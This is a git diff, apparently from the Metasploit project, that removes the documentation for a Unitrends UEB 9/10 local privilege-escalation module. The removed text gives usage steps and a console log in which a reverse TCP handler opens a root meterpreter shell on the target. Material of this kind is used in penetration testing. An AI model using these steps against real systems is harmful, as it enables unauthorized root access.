ueb privesc updates
parent
4d65174f6d
commit
4af5ab3089
|
@ -1,38 +0,0 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Unitrends UEB 9/10 local privesc
|
||||
|
||||
This exploit leverages bpserverd proprietary protocol to issue commands
|
||||
as root.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Get a shell with exploit/linux/http/ueb10_api_systems
|
||||
2. ```use exploit/linux/local/ueb_priv_esc ```
|
||||
3. ```set session [SESSION]```
|
||||
4. ```exploit```
|
||||
5. A highpriv meterpreter session should have been opened successfully
|
||||
|
||||
## Scenarios
|
||||
|
||||
### UEB 10.0 on CentOS 6.5
|
||||
|
||||
```
|
||||
msf > use exploit/linux/local/ueb_priv_esc
|
||||
msf exploit(linux/local/ueb_priv_esc) > set session 4
|
||||
session => 4
|
||||
msf exploit(linux/local/ueb_priv_esc) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 15.0.0.177:4444
|
||||
[*] Writing payload executable to '/tmp/pEFoythF'
|
||||
[*] Writing privesc script to '/tmp/CTZSovJR'
|
||||
[*] Fixing permissions
|
||||
[*] Sending stage (857352 bytes) to 10.20.1.202
|
||||
[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
|
||||
[+] Deleted /tmp/pEFoythF
|
||||
[+] Deleted /tmp/CTZSovJR
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0
|
||||
|
||||
```
|
Loading…
Reference in New Issue